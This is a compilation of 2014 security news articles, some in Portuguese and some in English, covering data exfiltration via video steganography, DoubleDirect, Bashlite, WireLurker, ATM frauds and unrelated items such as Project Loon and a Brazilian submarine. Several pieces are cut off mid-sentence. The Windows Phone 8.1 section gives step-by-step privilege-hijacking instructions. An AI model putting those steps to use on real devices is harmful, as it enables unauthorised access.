Payload hide on video.

Security experts have detected an attack against a major firm that used a data exfiltration technique based on the video steganography.

Threats actors in the wild are exfiltrating data with a technique based on video uploaded to cloud services. Attackers adopted this trick to move data from a compromised target outside without detection by conventional solutions, such as intrusion detection/prevention systems. To further improve the tactic, bad actors utilize steganography to hide encrypted data into video uploaded to an unmonitored video sharing service.

Why only videos and not images?

Security experts know that there are several tools available that can detect the use of steganography in images, these software are able in fact to detect signatures of common steganography tools and techniques. The situation is quite different for video and threat actors  using the exfiltration technique that we have described know it.

The attackers can use one several off the shelf tools or open source software (i.e. OpenPuff) to implement steganography of exfiltrated data. As revealed by TripWire in a blog post, one of the Fortune 500 companies was recently hit by hackers that used the above technique to exflitrate data.

data exfiltration videos

The data exfiltration went undetected until the company noticed several duplicate video files had been uploaded from their network to a video sharing website.

There are a number of tools available that can detect the presence of steganography in images on a network, such as software to appliances designed specifically for detecting signatures of common steganography tools and techniques. The problem is they are generally designed to detect the use of steganography in images, not video. The groups using this as an exfiltration technique are well aware of this, hence why they are using video instead of images which would be an easier transport mechanism.

As mitigation strategy it is suggested to network administrators to monitor the installation of application or custom binaries used by attackers to encode data into a video or an image. Administrators should already be monitoring assets for new binaries on hosts. The administrators anyway need to monitor outcoming connections to external services that could

Another mitigation strategy to detect software that could be used in the data exfiltration technique described is to scan of host systems for video files especially for the assets that are critical in the network.

Also, by monitoring connections of a host system to external services administrators is possible to detect suspicious activity.

As explained by TripWire, in the case of the Fortune 500 company that was targeted with this data exfiltration technique, the attackers used the same videos to send different pieces out of the targeted network.

Pierluigi Paganini

(Security Affairs –  Data exfiltration, cybercrime)

Racker arrependido que emprego legal.

Londres - Ryan Ackroyd mexia, nervoso, no microfone preso em sua camisa enquanto cerca de 200 colegas estudantes lotavam um auditório da Universidade Sheffield Hallam.

“Essa é a primeira palestra que eu faço”, disse ele, após ser apresentado como ex-hacker e, atualmente, estudante. “Eu fiz algumas coisas muito, muito ruins”.

Ackroyd, 27, e outros três membros do grupo de hackers LulzSec foram presos em 2013. Os membros do grupo, que nunca se reuniram pessoalmente,derrubaram os sites da Sony, da News Corp., da CIA e da polícia do Arizona.

Eles tiveram como alvo também a Força Aérea dos EUA e o Serviço Nacional de Saúde da Grã-Bretanha.

“As empresas sofreram sérios danos financeiros e à sua reputação”, disse Andrew Hadik, um promotor britânico, depois que os quatro foram condenados, em maio de 2013.

Ackroyd, que havia se declarado culpado pelas acusações, foi condenado a 30 meses de prisão e cumpriu nove meses.

Liberado no início de fevereiro, ele está estudando para um mestrado em segurança de sistemas de informação na Sheffield Hallam, ao norte e a cerca de três horas de trem de Londres.

No discurso para os estudantes, em 25 de novembro, ele disse que se arrependia do que fez e que esperava dar um uso melhor às suas habilidades.

Os mesmos talentos que colocaram Ackroyd na prisão um dia poderiam garantir a ele um salário anual de seis dígitos?

As empresas “reconhecem que há uma tempestade perfeita de segurança cibernética ocorrendo e que não há profissionais suficientes para atender as suas necessidades”, disse Del Heppenstall, diretor da KPMG LLP, que trabalha em segurança da informação.

“Isso deixou uma lacuna no mercado”.

Autodidata

Ackroyd, que largou a escola aos 16, aprendeu sozinho a ler códigos de computadores.

Ele começou a hackear aos 11 ou 12 anos, primeiro porque queria trapacear em jogos de computador, alterando o código para conseguir vidas infinitas ou invencibilidade. Isso mostrou ser viciante.

“Entrar em um servidor era algo que eu via apenas como um desafio”, disse ele, na palestra na Sheffield, que ele chamou LulzSec, 50 Days of Lulz. “Se eu não conseguia entrar, isso apenas me fazia querer ainda mais”.

A LulzSec era uma ramificação do grupo Anonymous, formado pelos ativistas on-line que atacaram os sites da PayPal e da MasterCard quando essas empresas interromperam os pagamentos para o WikiLeaks depois que a organização publicou informação militar dos EUA.

O nome deriva da frase “rindo da segurança”, disse Ackroyd, porque eles descobriram que a segurança on-line era tão ruim que merecia seu desprezo.

Um punhado de membros da LulzSec acessou milhões de nomes de usuários e endereços de e-mail do servidor da Sony e interceptou as comunicações do FBI a partir do sistema de computador de um prestador de serviço privado, disse Ackroyd.

Custos crescentes

O dano causado pelos hackers ajuda a explicar por que há tanto demanda por especialistas em segurança cibernética.

Em média, os principais incidentes custam às empresas 1 milhão de libras (US$ 1,57 milhão), o dobro de um ano atrás, disse Giles Smith, funcionário do Departamento de Negócios, Inovação e Habilidades do Reino Unido, em uma conferência em Londres, na semana passada.

Ackroyd recebeu formação em tecnologia da informação enquanto esteve na prisão e espera fazer carreira no ramo de ética hacker, embora reconheça que pode ser difícil para os empregadores confiar nele.

Stephanie Crates, consultora na agência de recrutamento Harvey Nash, em Londres, disse que os profissionais que testam a penetração em sistemas sênior -- os chamados hackers “chapéu branco”, que testam sistemas de segurança tentando invadi-los -- podem ganhar até 90.000 libras ao ano, ou 900 libras por dia como prestadores de serviço.

“É altamente provável que as empresas já estejam contratando hackers e ex-hackers, sabendo ou não dessas suas habilidades, caso eles nunca tenham sido pegos”, disse Crates.

A KPMG publicou uma pesquisa no início deste mês intitulada: “Hire a Hacker to Solve Cyber Skills Crisis, Say U.K. Companies” (“Contrate um hacker para resolver a crise de habilidades cibernéticas, dizem empresas do Reino Unido”, em tradução livre).

Mais da metade das empresas que participaram da pesquisa da KPMG disse que estudaria empregar um especialista em TI com ficha criminal.

“Agora que estou fora da prisão, me sinto um pouco mais otimista”, disse ele. “Eu queria estudar, espero que isso me leve a algum lugar bom”

New kind of mdm

Security experts at Zimperium discovered a new MITM attack technique dubbed DoubleDirect that is targeting iOS, Android and Mac users worldwide.

DoubleDirect is the name of a new Man-in-the-Middle (MitM) attack discovered by security researchers that is targeting mobile devices running either iOS or Android and potentially Mac OS X systems.

The DoubleDirect MitM attack allows attackers to hijack the victim’s traffic of major websites such as Facebook, Google and Twitter to a device controlled by the attacker.

As explained by security experts at mobile security firm Zimperium, once the attackers has redirected the victim’s traffic, it could be able to steal victims’ sensitive data, including personal data and login credentials, or serve malicious code on the targeted device.

In the blog post recently published by Zimperium the experts revealed that threat actors worldwide are already exploiting the DoubleDirect technique across 31 countries. Bad actors redirected users of several IT companies, including Facebook, Google, Hotmail, Live.com and Twitter.

doubledirect MITM attack

The DoubleDirect technique exploits the ICMP (Internet Control Message Protocol) redirect packets in order to change the routing tables of a host used by routers to provide information on the best path to the destination.

“With the detection of DoubleDirect in the wild we understood that the attackers are using previously unknown implementation to achieve full-duplex MITMs using ICMP Redirect” states the post.

As explained by experts Windows and Linux users are immune to the DoubleDirect attack because most of GNU/Linux and Windows desktop operating system do not accept ICMP redirect packets that is exploited by attackers to carry the malicious traffic.
“An attacker can also use ICMP Redirect packets to alter the routing tables on the victim host, causing the traffic to flow via an arbitrary network path for a particular IP,” Zimperium warned. “As a result, the attacker can launch a MitM attack, redirecting the victim’s traffic to his device.“

“Once redirected, the attacker can compromise the mobile device by chaining the attack with an additional Client Side vulnerability (e.g.: browser vulnerability), and in turn, provide an attack with access to the corporate network.“

Zimperium has provided a Proof-of-Concept (PoC) for the DoubleDirect Attack, the code allows full-duplex ICMP redirect attack by predicting the IP addresses the victim tries to connect to. The IP addresses are predicted by sniffing the DNS traffic of the target, once discovered that attackers send an ICMP redirect packet to all IP addresses.
“We have investigated the attacks and also created a POC tool to prove that it is possible to perform full-duplex ICMP Redirect attacks. ICMP Redirect attacks are not easy to emulate because the attacker must know beforehand which IP address the victim has accessed”
The experts at Zimperium also explained how to manually disable ICMP Redirect on their Macs to remediate the issue.
“Zimperium is releasing this information at this time to increase awareness as some operating system vendors have yet to implement protection at this point from ICMP Redirect attacks as there are attacks in-the-wild,” the post reads.

Balões para levar internet a áreas remotas.

Google revelou alguns detalhes do projeto Loon, que usará balões para levar internet para áreas remotas. Entre os dados, a empresa indica que os balões estão muito mais resistentes, capazes de permanecer 100 dias no ar, 10 vezes mais do que no ano passado.

A empresa também fez grandes progressos nas técnicas para inflar balões, conseguindo preenchê-los com gás em apenas 5 minutos. Desta forma, a empresa é capaz de lançar até 20 balões por dia, muito mais do que era possível antigamente.

Outro dado interessante é que os balões que já foram lançados pelo Google, que podem flutuar pela estratosfera e subir e descer para se adequar às correntes de ar, já navegaram por cerca de 3 milhões de quilômetros, o que seria suficiente para quatro viagens de ida e volta até a lua.

Esta técnica de navegação foi apurada nos últimos tempos. De acordo com a empresa, as simulações constantes de tragetórias fazem com que os balões cheguem aos seus destinos com muito mais precisão do que inicialmente. Em um dos casos, foi possível viajar cerca de 9 mil quilômetros e ficar apenas a 1,5 km do destino, apenas calculando as correntes de vento´s estratosféricos.

A expectativa da empresa é fechar parcerias com as empresas de telecomunicações para distribuir o sinal, o que significa que provavelmente não será o Google que distribuirá o sinal, mas companhias como TIM, Claro, Oi e Vivo. Elas terão acesso aos balões para transmissão da estratosfera, com custos que devem ser menores do que a implantação de toda a infraestrutura necessária.

Primeiro submarino construido no Brasil passa por manutenção.

Folha Militar Online » Marinha » Primeiro submarino construído no Brasil, Tamoio, realiza “load-in” para início do período de manutenção no Rio
Primeiro submarino construído no Brasil, Tamoio, realiza “load-in” para início do período de manutenção no Rio
Brasília, 21/11/2014 – Após 20 anos de bons serviços prestados à Marinha do Brasil, na vigilância e proteção da chamada “Amazônia Azul”, área oceânica de 4,5 milhões de km² que concentra riquezas naturais, o submarino Tamoio (S-31) iniciou novo Período de manutenção

A iniciativa, que ocorre a cada seis anos, tem como finalidade restabelecer as condições de operação de seus equipamentos e sistemas.

De acordo com o diretor do Arsenal de Marinha do Rio de Janeiro (AMRJ), contra-almirante Mário Ferreira Botelho, a manutenção obedece a rigorosos critérios de qualidade, o que é essencial para garantir e resgatar a capacidade operacional do submarino.

“Durante esse período são reparados diversos sistemas mecânicos, elétricos e eletrônicos, bem como realizadas inspeções estruturais, incluindo possíveis reparos do casco resistente”, explicou o almirante.

No início do processo, o submarino Tamoio foi retirado da água e levado para um galpão do AMRJ. Nesse procedimento, conhecido como load-in, o submarino “pousa” em cima de uma balsa alagada, dentro de um dique. Após a retirada da água, a balsa é suspensa, permitindo que o submarino seja movimentado e alinhado ao galpão, junto com a balsa.

Primeiro submarino construido 2Após essa etapa, a embarcação foi transportada para o interior da própria balsa por duas carretas, com importantes cálculos de engenharia, em trabalho que durou mais de quatro horas.

O Brasil é o único país do Hemisfério Sul que possui know-how para realizar load-in de submarino. Para efetuar toda a operação, profissionais da Marinha passaram por 20 dias de intenso planejamento e preparação.

Força de Submarinos

Durante o período de manutenção do Tamoio S31, permanecem em operação no patrulhamento e vigilância da costa nacional os submarinos Tupi S30, Timbira S32, Tapajo S33 e Tikuna S34.

Além dele, a Marinha irá incorporar cinco novos submarinos, atualmente em processo de desenvolvimento, como resultado de parceria entre o Brasil e a França. O acordo possibilitará a transferência de tecnologia dos modelos scorpénes.

Quatro desses submarinos são à diesel-elétricos e no Brasil receberão a nomenclatura S-BR. O quinto submarino, com propulsão nuclear, será fabricado no Estaleiro e Base Naval em Itaguaí (RJ), com tecnologia totalmente nacional.

Os cinco submarinos vão incorporar a Força de Submarinos, que completou 100 anos em 2014.

Submarino Tamoio e a história do Brasil

Durante todo seu atual ciclo de operação, iniciado em 2005, o submarino Tamoio participou de diversas operações em toda a extensão nacional, tendo atuado na vigilância de áreas estratégicas, como as bacias petrolíferas do pré-sal.

Incorporado em 1995 à Marinha do Brasil, o Tamoio foi batizado e lançado ao mar em 1993 e, ao longo desse período, já passou por vários testes operacionais. O submarino, da Classe Tupi, tem tecnologia brasileira e projeto alemão.

Primeiro submarino construido 3“A construção dos submarinos, Classe IKL-209 – número de série atribuído pelo fabricante ao projeto deste submarino –, no país representou a concretização de uma importante aspiração da Marinha. O desenvolvimento tecnológico mundial, assim como o relacionamento entre os países, transformaram o submarino em uma arma de fundamental relevância ao exercício do domínio no mar”, acrescentou o almirante Mário Ferreira.

Os submarinos são embarcações especializadas para operarem submersos e, por esta peculiaridade, são utilizados militarmente, também, por serem difíceis de localizar e destruir. Atualmente a Marinha possui cinco submarinos, sendo quatro da classe Tupi, com projetos de 1989, e um da classe Tikuna, com projeto de 2005. Todos possuem 1,4 mil toneladas.

Intel and Europol together to combat cibercrime

An MOU between Intel Security Firm and Europol, will see the two combine resources and Expertise in combating cybercrime, in an already porous battle line. As cybercriminals advance their techniques and expertise, it is paramount that all those on the receiving end stage a united front or perish one at a time.

Europol received a boost in its fight against cybercrime after McAfee signed an MOU to help shore up Europol’s security operations. The MOU will see the two combine resources and expertise in forming a solid defense against cybercrime, in an already porous battle line.

McAfee, acquired by Intel Security group in 2010, will offer technical support to Europol in addition to participating in joint cybercrime operations and sharing non-operational data on cybercrime.  With its innovative approach to internet security and vast intelligence on Global threats, Intel security will be an important strategic ally to EU’s top cops.

“Cybercrime has advanced to a degree that no one entity can combat it alone,” said Raj Samani, chief technology officer for EMEA at Intel Security and special advisor to the EUROPOL Cybercrime Centre on Internet Security . “I’m excited to work with the excellent team Europol and contribute expertise so that we can together to effectively address the cybercrime problem.”

High profile attacks such as the JPMorgan, Whitehouse and the Target clearly shows that cybercriminals are advancing their techniques and expertise, leaving law enforcement agencies entirely clueless in all occasions. In such an environment, it is paramount that all those on the receiving end including law enforcement agencies stage a united front, a fact Troels Oerting, Head of the EC3 acknowledged when welcoming Intel on board. “Today we add the resources of Intel Security to our list of capabilities dedicated to protecting our digital lives. This task cannot be done by law enforcement alone, and requires a much broader approach,” said Oerting.

Apparently, McAfee and Europol have partnered on cybercrime before andthe MOU signed on Wednesday was only meant to formalize and expand their co-operation.“Intel Security has assisted the European Cybercrime Centre (EC3) in the past and, with the signing of this MOU, our cooperation will continue to the benefit of all law-abiding users of the Internet and to the disadvantage of cybercriminals,” said Oerting in a press release.

In the past, Cyber security firms have only cooperated with law enforcement agencies through informal arrangements. The new MOU between Intel Security and Europol marks a new era of cooperation in fighting cybercrime, with more cyber security firms expected to come on board in the coming days.

EU state countries have also shown unprecedented cooperation in the war against cybercrime Currently, over 30 states have ratified the Council of Europe’s Convention on Cybercrime, an international treaty that seeks to harmonize cybercrime Laws among party states. The treaty will also establish a cross-border and cybercrime investigation unit to respond on cyber threats on a real time basis.

Europol is a cross border agency that helps combat international crimes in the European Union. Its cybercrime unit, European Cybercrime Unit (EC3), located in The Hague offers technical supports to other EU states cybercrime units. EC3, formed last year, relies Europol’s extensive network to help EU states investigate and comber cybercrime, including state backed cyber-espionages attacks that are currently ruling the cyberspace.

Brazilian Cibercrime picture

Trend Micro has published a new study on black cyber-markets focusing on product and services offered on the Brazilian underground.

Trend Micro has published a new interesting report on the underground cyber-markets, this is a third study focused on the Brazilian cyber-underground offer, the previous ones analyzed Russian and Chinese marketplaces.

The new study, exactly like previous analysis, describes a thriving marketplace where cyber criminals proposes their services and products to criminal crews that instead of creating their own attack tools from scratch could benefit of the competitive offer. The study reports the principal solution and services proposed to the crooks in a model of sale known as crime-as-a-service that is able to attract new actors in the cyber arena.

A first data that immediately catches the attacention of the experts is decrease of prices recently offered, this is a further element of attractive for criminals that look to the cyber crime with increasing interest.

“The barriers to launching cybercrime have decreased. Toolkits are becoming more available and cheaper; some are even offered free of charge. Prices are lower and features are richer. Underground forums are thriving worldwide, particularly in Russia, China, and Brazil. These have become popular means to sell products and services to cybercriminals in the said countries. Cybercriminals are also making use of the Deep Web to sell products and services outside the indexed or searchable World Wide Web, making their online “shops” harder for law enforcement to find and take down.” states the ‘The Brazilian Underground Market’ report.

Another element of distinction between the Brazilian underground and the Russian and Chinese ones, is the availability of training services, for this reason the Brazilian underground ecosystem is also considered as the market for cybercriminal Wannabes.

“What distinguishes the Brazilian underground from others is the fact that it also offers training services for cybercriminal wannabes,” according to the whitepaper. “Cybercriminals in Brazil particularly offer FUD (fully undetectable) crypter programming and fraud training by selling how-to videos and providing support services via Skype. Anyone who is Internet savvy and has basic computing knowledge and skill can avail of training services to become cybercriminals. How-to videos and forums where they can exchange information with peers abound underground. Several trainers offer services as well. They even offer support when training ends.”

The Brasilian cyber criminals seem to be more ruthless in the use of media platforms like Facebook, YouTube, Twitter, Skype, and WhatsApp, differently from Russian and Chinese players that “hide in the Deep Web and use tools that ordinary users do not such as Internet Relay Chat (IRC) channels”

For several years, Brazil has been known for the offer of banking Trojans, many malware were designed by Brazilian which targeted internal banking users and that implemented several techniques to steal victims’
credentials. Brazil ranks second worldwide in terms of online banking fraud and malware infection, on a global scale it accounts for almost 9% of the total number of online-banking malicious code that compromised

Brazilian underground banking malware

Banking Trojan source codes are sold for around US$386 each, the offer allows buyers to modify their codes according their needs, they can obfuscate strings, customize the composition of payloads and add crypters and other solution to evade the detection. Another product very popular are  Bolware kits and toolkits used to create bolware that are offered for around US$155, the applications offered by cybercriminals are user-friendly and implements an easy to use control panel for monitoring and managing infections and malicious activities.

Brazilian underground banking malware prices

The Brazilian underground also offers a bank fraud courses for aspiring cyber-criminals, the courses are very articulated and propose detailed information for beginners to the criminal activities. The courses starts presenting the fraud workflow and tools necessary to arrange a cyber fraud. Some coursed are arranged in modules that propose interesting information on the illegal practices to cybercriminal wannabes that can acquire also interactive guides and practical exercises (e.g., simulating attacks). A 10-module corse for example is offered for US$468, the operators also offer updates and a Skype contact service.

According to the author of the study on the Brazilian underground market, Trend Micro Senior Threat Researcher Fernando Merces, several factors have contributed to the growth of cyber-criminal activity in the country like limited resources assigned to law enforcement and the existence of a flexible underground market.

“For example, Brazil has a lack of concrete laws and limited law enforcement agency resources that address cybercrime in the country,” he noted. “Additionally, the technological and consumer landscape in Brazil, which has a 50% Internet penetration rate, and a 69% credit card penetration rate, has made the country all too appealing for cybercriminals. However, another factor may have also contributed to Brazilian cybercrime: the existence of a flexible underground market with different offerings, ranging from banking Trojan development to online fraud training. The latter is highly notable as this is the most unique item in the market, which may not be found in other underground markets.” explained Merces in a blog post. 

The report details prices and products for many other products and services, including Credit card credentials and number generators, SMS-spamming services and  phishing pages for popular banks.

Let me close the post with a meaningful statement from the author of the study that explain how is simple today to become a dangerous cyber criminals with limited resources.

“In Brazil, it’s possible to start a new career in cybercrime armed with only US$500,” Merces blogged. “Would-be cybercriminals are supported and helped by tools, forums, and experts from the dark side of the Internet. These bad guys do not fear the authorities and their groups get bigger in a short span of time.”

Let me suggest you to read the full report published by Trend Micro, it is full of interesting data.

Pierluigi Paganini

(Security Affairs –  Brazilian underground, cybercrime)

Cibercrime use Bash Vulnerability

Cyber criminals are using new malware variants by exploiting GNU Bash vulnerability referred to asShellShock (CVE-2014-6271) in order to infect embedded devices running BusyBox software, according to a researcher.

A new variant of "Bashlite" malware targeting devices running BusyBox software was spotted by the researchers at Trend Micro shortly after the public disclosure of the ShellShock vulnerability.

BusyBox provides set of command line utilities that are specifically designed to run in constrained embedded environments. At compile time, different capabilities can be left out, reducing the size of the binaries, and efforts are made to make them memory efficient. This makes the software an excellent candidate for use in consumer electronics devices, which seem to have been the items of interest in this case.

The malware variant, detected as ELF_BASHLITE.A (ELF_FLOODER.W), when executed on victim's machine, scans compromised networks for devices such as routers and Android phones running BusyBox to brute force logins through a preset list of usernames and passwords.

The variant would then run a command to download and run bin.sh and bin2.sh scripts to gain control over Busybox systems once a connection was established. Therefore, this newer version of Bashlite is designed not only to identify systems running BusyBox, but also to hijack them.

"Remote attackers can possibly maximize their control on affected devices by deploying other components or malicious software into the system depending on their motive," threat response engineer at Trend Micro, Rhena Inocencio wrote on a blog post.

"As such, a remote attacker can issue commands or download other files on the devices thus compromising its security."

Miscreants attempted to log in using a predefined list of usernames which include 'root', 'admin' and 'support' and common and default list of passwords such as 'root,' 'admin,' '12345,' 'pass,' 'password,' '123456' and so on.

Trend Micro's Inocencio urged users to change their default usernames and passwords in order to keep them on the safer side, and also to disable remote shells, if possible, to avoid its exploitation.

Bashlite malware includes the payload of the ShellShock exploit code and threat actors have used this critical ShellShock Bash command vulnerability (CVE-2014-6271) to build botnets from hijacked devices, launchdistributed denial-of-service (DDoS) attacks, and target network attached storage boxes among other exploits.

The Critical ShellShock Bash bug was disclosed on September 24 and by September 30 security firms estimated that attacks using the exploit could top 1 billion, and more than 1000 organizations patched the ShellShock bug as fixes became available.

EASE, the DHS concept of self-repairing networks

by Pierluigi Paganini on November 18th, 2014

The Department of Homeland Security is working with industry to the EASE concept, a self-repairing systems able to avoid the interruption of the operations.

The Department of Homeland Security is working on a new generation of self-repairing network that is able to be resilient to cyber offensives and continue operations in case of attack.

Enterprise Automated Security Environment (EASE), is the name of the project conducted by the DHS with industry for the development of an automated cyber defense system, as explained by Philip Quade, chief operating officer of the National Security Agency’s information assurance directorate, to the Nextgov.

Resiliency is considered by cyber security experts an essential characteristic of future networks, cyber attacks are becoming even more sophisticated and frequent and computer systems have to be improved to remain operative despite the ongoing offensive.

In the recent weeks, several attacks hit government networks, causing data breaches and temporarily  shut down of the infrastructure, as happened in the attacks against the White House, the U.S. Postal Service and the National Weather Service.

The goal is the realization of a network of computers that is able to avoid disrupting activities and protect sensitive information.

Actually, government entities have deployed a series of internal controls to detect the early attacks and quickly recover from potential cyber attack. EASE is an ambitious project, despite it is in a very early stage, the Department of Homeland is spending a great effort into its realization.

The EASE project will integrate the ongoing project related to the network surveillance program conducted by the US Government that allocated $6 billion to support it.

“EASE is an evolving concept aimed at further automating the detection and prevention of cyber intrusions against federal government networks by creating a suite of technologies to augment existing methods,” DHS spokesman S.Y. Lee said in an email.

The surveillance program, dubbed “continuous diagnostics and mitigation,” is under development by US authorities to realize a real-time monitoring of all federal networks for threats.

“Homeland Security is leading its development, in coordination with private sector partners, as part of a long-term effort to strengthen existing cyber defense capabilities through better interoperability and shared situational awareness, real-time response, and the protection of privacy, civil rights and civil liberties,” Lee added.

The DHS’official anyway remarked that EASE is still an idea in an embryonic, but it is also a concrete need for the country and for this reason the US Government will continue to support it and any other program that could improve its cyber capabilities.

Pierluigi Paganini

Suspected Wirelurker iOS Malware Creators Arrested in China

It’s been almost two weeks since the WireLurker malware existence was revealed for the first time, andChinese authorities have arrested three suspects who are allegedly the authors of the Mac- and iOS-based malware that may have infected as many as hundreds of thousands of Apple users.

The Beijing Bureau of Public security has announced the arrest of three suspects charged with distributing the WireLurker malware through a popular Chinese third-party online app store. The authorities also say the website that was responsible for spreading the malware has also been shut down.

"WireLurker" malware was originally discovered earlier this month by security firm Palo Alto Networks targeting Apple users in China. The malware appeared as the first malicious software program that has ability to penetrate the iPhone's strict software controls. The main concern to worry about this threat was its ability to attack non-jailbroken iOS devices.

Once a device infected with the malware, the virus could download the malicious and unapproved apps, which are designed to steal information, from the third-party app stores and, if it detects an iOS device connected through the USB slot, it would install the malicious apps on the device as well.

"This malware is under active development and its creator’s ultimate goal is not yet clear," the researchers wrote in a report [PDF]. "The ultimate goal of the WireLurker attacks is not completely clear. The functionality and infrastructure allows the attacker to collect significant amounts of information from a large number of Chinese iOS and Mac OS systems, but none of the information points to a specific motive. We believe WireLurker has not yet revealed its full functionality."

Unlike most iPhone bug, WireLurker malware has ability to install even on non-jailbroken iOS devices because the malware authors have used enterprise certificates to sign the apps. Apple has since revoked these cryptographic certificates used to sign WireLurker, and blocked all the apps signed with it. Palo Alto estimated that hundreds of thousands of users installed the malicious apps.

China appears to have taken the threat very seriously and within two weeks arrested three individuals who are believed to be the creators of the malicious software.

Although, there is not much details available about the arrest as the Bureau has simply posted a short notification on its Sina Weibo, a Chinese micro blogging service.

But according to the Chinese authorities, the three suspects are identified as "Chen," "Lee" and "Wang," who are suspected of manufacturing and distributing the malicious program "for illegal profit," and that the Chinese authorities have been helped in the investigation by researchers from Chinese AV company Qihoo 360.

Windows Phone possible hack.

Operators of the XDA-developers forum explained how it is possible to hack Windows Phone 8.1 to run any app package in any Program directory.

XDA-developers have discovered a new vulnerability in latest Microsoft OS Windows Phone 8.1 that could easily be exploited by attackers to compromise a Nokia Lumia phone running it.

The XDA Developers member known as DJAmol has discovered a vulnerability in the OS Windows Phone 8.1 that allows hackers to run arbitrary applications with other user’s privileges and edit the registry.

The XDA developers forum has already reported the security issue to the Microsoft, as explained by the operators of the forum the vulnerability could give higher privileges to the attackers if tried using a First Party Application, rather a third party app.

“There is a possibility to run any app package in any Program directory. Can be possible run homebrew app in second party and first party directory. Important thing is that app run’s with the reserved capabilies of the targeted directory. Such as “SECOND PARTY APPLICATION” capabilities and “FIRST PARTY APPLICATION” capabilities.” XDA-developers state in a blog post.

The hackers explained that simply by replacing the contents of a trusted OEM app that has been transferred over to the SD card, the attacker’s app will inherit the privileges of the legitimate one. Once transferred the malicious app, the attacker have to delete the existing directory and create a new one with the same name as the original App.

In this way the third party registry editor app will gain full access to the Info and Settings in the app itself. The XDA-developers provided a detailed description of the hack on Windows Phone 8.1 in their post, below the basis steps to execute.

• Develop your own application package and deploy it on the target device.
• Install an application from the Window Phone app Store, for example “Glance Background Beta”.
• Delete all folders under the targeted directory of the installed app, in this example proposed by the hackers, Glance background [Install, NI, TempInstall, TempNI, XBF etc].
• Copy the contents of your own deployed package in the targeted directory, replacing the “Program Files” of the installed app with your package files.
• Launch the App that will run in OEM (Glance Background beta) directory with the privileges of the targeted App.

The hack on the Windows Phone 8.1 is very easy to implement, but it has not yet escalated to a full interop unlock, as the applications that are allowed to be moved to the SD card have limited access.

“Doees this mean that lumia phones can be-are interop unlocked?” asked the user matgras

“May be or may not be. I’ve not research yet on it.  Does this mean that lumia phones can be-are interop unlocked?

Those methods also work on any OEM Device, not specific for the Lumia.”

Stay tuned for more information on the case that are expected from Microsoft.

Pierluigi Paganini

MORE ATM HAKED

EmailPrint
Two little known Tennessee men used factory default passcode to dupe ATM machines into giving more cash in an 18 months hacking spree cut short by Secret Service.  The money minting operations proves how low-tech street criminals poses a threat to poorly configured and serviced ATMs all over the world.

A recent shocker in the tech world revealed that over 80% of ATM’s use outdated Windows XP which run out commercial support years ago. Just to show how ATMs machines are vulnerable to low-tech street crime, two little know  Tennessee men, Khaled Abdel Fattah and his accomplice Chris Folad,  went on an ATM hacking spree in Nashville, netting over $400,000 hard cash in their 18 moths expedition.

Note that this was a not typical hack employing sophisticated banking malwares to steal money. Instead the two used a sequence of key combinations on the Keypad to configure the ATM into “Operator mode” and crack the cash dispensers. Once on operator’s modes the ATM was configured to dispense $20 for $1 requested. For example a $20 withdrawal would dispense $400 hard cash.

Fattah and his accomplice now face an array of computer frauds charges following their short-live money minting operations in Nashville. “Fattah and an associate named Chris Folad are facing 30 counts of computer fraud and conspiracy, after a Secret Service investigation uncovered evidence that the men had essentially robbed the cash machines using nothing more than the keypad,” reported wired in a blog.

Technically, ATM can be configured into operators mode using passcode initial provided the manufacturer.  Once on operator’s mode, the operator is able to configure how the ATM dispenses cash including the denomination loaded on the cartridges. In this case, Fatah was a former employee of ATM firm and all he needed was to key in the factory-set passcode.

The fraud was first discovered by the business owner who realized an abnormality in cash flows in one of ATM kiosks visited by the duo. He informed the secret service who analyzed surveillance footage, tracked and nailed Fattah and his accomplice.

“They were little kiosk ATMs, like you would find in a business or a convenience store,” says Greg Mays, assistant special agent in charge of the US Secret Service’s Nashville office. “I believe the businesses noticed there was a problem when the machine was running out of money.”

Fortunately, Fattah and his friend conducted their operation in the full glare of security cameras, they also used their real debit cards making it easy for Secret Service to trail and net them.

Exploits of this nature are common in the Tech world, but majority of the incidences go unreported by banks and other financial institutions who fear the possibility of a bank run. The problems lies with the factory resent passcode given by the ATM vendor and usually written on ATM manual. A majority of the small business owners fail to reset the default code on a new machine or when an employee leaves.  In reality, the code should be changed frequently and maintained within a small circle of employees if necessary.

In a similar ATM hack in 2005, fraudsters discovered the factory set passcode of Tranax and Triton ATMs, was freely available online. They went viral hacking every available Machine prompting Triton and Tranax to reprogram their machine and force operators to change the passcode on first use.

In another incidence a 14-year old boy in Winnipeg followed an instruction manual to crack the operator’s passcode to access a Bank of Montreal ATM in June this year. The boy notified the bank to change its

More ATM haked

Cybercrime expert explains anyone with technical knowledge, a malware and the help of an insider could easily hack an ATM machine.

A RM100 chip, specific technical knowledge and a free malware obtained over the Internet is all the necessary to hack Automated Teller Machines (ATMs), this is the opinion of a cybercrime expert, which released an exclusive interview to the FMT (freemalaysiatoday.com).

The cybercrime expert was invited to report in regard to a recent hacking case of 17 ATMs, a Latin American gang of cyber criminals was able to hack and steal millions of dollars from the automated teller machines in Malaysia.

The hackers steal more than $1.2 million from ATMs of at least 17 bank branches belonging to United Overseas Bank, Affin Bank, Al Rajhi Bank and Bank of Islam were reportedly hacked into by the Latin American gang.

The Closed-circuit television (CCTV) footage from the banks showed that 2-3 Latin American men entered and withdraw money from these targeted ATM machines.

“What you need is a mastermind, a RM100 computer chip and possibly a bank ‘insider’ to execute the attacks.” he said.

The 17 ATM hacks must be a warning for the banking industry that according to the expert is loosing field in the fight against cybercrime.

“Banks should look into their security seriously, and not just for the sake of compliance.”“This mentality has to be changed to build security in the DNA of the bank.”

RM100 ATM hacking

A little information is needed to the attacker, the knowledge of the targeted system could be enough to compromise a banking ATM, all this information  typically provided by insiders.

“He (the hacker) will know where the locks and connections are, the model of the machine, the level of security and the version of the operating system.” explained the expert.

The expert also pointed out the roles of the guys captured by the surveillance cameras at the bank

“The guys caught on the CCTV are not the actual criminals.” “It’s like the ‘monkey see, monkey do’ situation. They can be shown what is supposed to be done without the need for any technical knowledge. They probably do not even know what they are doing.”

According to the expert, the hack of an ATM machine could be very easy using malware easy to find in the underground, a security expert has  no problem to wreak havoc on the actual banking system.

“It is a simple attack as there are many free malware available online. And it is definitely something that the bank has to seriously think about.”

Based on his experience in the sector, the expert highlighted the wrong approach of the banking industry in the protection of ATMs machines, in many cases these machines run out dates OSs, lack of patch management or they are poorly configured.

The expert is very controversial with financial institutions, he explicitly refers to the results of a series of penetration tests conducted against banking systems that succeeded to breach the

“The bank I worked for was not happy that we breached the system after doing a hacking” he said.  “It’s either they wanted to ensure that we couldn’t find anything, or, they will hire incompetent people who will not find anything.”

